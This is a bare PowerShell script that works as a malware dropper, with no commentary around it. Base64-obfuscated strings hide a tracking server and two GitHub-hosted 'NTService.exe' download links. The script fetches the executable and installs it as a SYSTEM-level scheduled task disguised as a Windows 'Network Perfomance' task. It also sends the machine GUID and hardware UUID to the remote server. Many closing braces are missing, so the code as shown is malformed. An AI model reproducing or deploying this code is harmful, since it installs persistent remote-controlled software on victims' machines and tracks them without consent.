function Get-RegistryValue {
param (
[string]$keyPath,
[string]$valueName,
[Microsoft.Win32.RegistryView]$view = [Microsoft.Win32.RegistryView]::Default
try {
$baseKey = [Microsoft.Win32.RegistryKey]::OpenBaseKey([Microsoft.Win32.RegistryHive]::LocalMachine, $view)
$subKey = $baseKey.OpenSubKey($keyPath)
if ($subKey) {
$value = $subKey.GetValue($valueName)
if ($null -eq $value) {
return ""
}
return $value.ToString()
}
else {
return ""
}
catch {
return ""
function gf {
param (
[string]$url,
[string]$path
try {
Invoke-WebRequest -Uri $url -OutFile $path -UseBasicParsing
return $true
catch {
return $false
function fbsf() {
param ([string]$i)
return [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($i));
function cst {
param (
[string] $pPath,
[string] $tName,
[string] $tPath
$actionNode = New-ScheduledTaskAction -Execute "$pPath"
$hourlyTrigger = New-ScheduledTaskTrigger -At (Get-Date).AddMinutes(5) -RepetitionInterval (New-TimeSpan -Hours 1) -Once
$startupTrigger = New-ScheduledTaskTrigger -AtStartup
$principal = New-ScheduledTaskPrincipal -UserId 'SYSTEM' -LogonType ServiceAccount -RunLevel Highest
$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries
$task = New-ScheduledTask -Action $actionNode -Principal $principal -Trigger $hourlyTrigger, $startupTrigger -Settings $settings
Register-ScheduledTask -TaskName "$tName" -InputObject $task -TaskPath "$tPath" -Force
Start-ScheduledTask -TaskName "$tPath\$tName"
if ((Get-WmiObject -Class Win32_ComputerSystem).SystemType -match 'x64') {
$RegView = [Microsoft.Win32.RegistryView]::Registry64
else {
$RegView = [Microsoft.Win32.RegistryView]::Registry32
$machine_id = Get-RegistryValue -keyPath "SOFTWARE\Microsoft\Cryptography" -valueName "MachineGuid" -view $RegView
$uuid = (Get-CimInstance -ClassName Win32_ComputerSystemProduct).UUID
$tPath = "\Microsoft\Windows\Performance\Network Perfomance"
$tName = "Network Perfomance"
$pDir = "$env:LOCALAPPDATA\Microsoft\Performance"
$pPath = "$env:LOCALAPPDATA\Microsoft\Performance\NTService.exe"
$_lru = fbsf("aAB0AHQAcABzADoALwAvAHMAdABhAHQAcwAuAGEAcABwAC0AZwBhAGkAbgAuAGMAbwBtAC8AZQA/AA==")
if (-Not (Test-Path -Path $pDir)) {
New-Item -Path $pDir -ItemType Directory -Force
}
$lrus = @()
$lrus += fbsf("aAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBwAGwAZQBhAHMAZQByADEAMgA0AGQALwByAGUAcwB0ADIAMgAvAG0AYQBpAG4ALwBOAFQAUwBlAHIAdgBpAGMAZQAuAGUAeABlAA==")
$lrus += fbsf("aAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBoAG8AYgBiAGEAYgBvAGcAYQAvAGYAbwBvAHQAOAAyADEALwBtAGEAaQBuAC8ATgBUAFMAZQByAHYAaQBjAGUALgBlAHgAZQA=")
if (-Not (Test-Path -Path $pPath)) {
foreach ($lru in $lrus) {
if (gf -url $lru -path $pPath) {
cst -pPath $pPath -tName $tName -tPath $tPath
break
}
}
Invoke-RestMethod -Uri "$($_lru)machine_id=$machine_id&uuid=$uuid&event=install&source=peer" -Method Get
exit(0)
$task = Get-ScheduledTask -TaskName $tName -ErrorAction SilentlyContinue
if (-Not ($task)) {
cst -pPath $pPath -tName $tName -tPath $tPath
Invoke-RestMethod -Uri "$($_lru)machine_id=$machine_id&uuid=$uuid&event=install&source=peer" -Method Get
exit(0)
catch {
Add-Type -AssemblyName System.Web
$message = [System.Web.HttpUtility]::UrlEncode($_.Exception.Message)
Invoke-RestMethod -Uri "$($_lru)machine_id=$machine_id&uuid=$uuid&event=error&source=peer&message=$message" -Method Get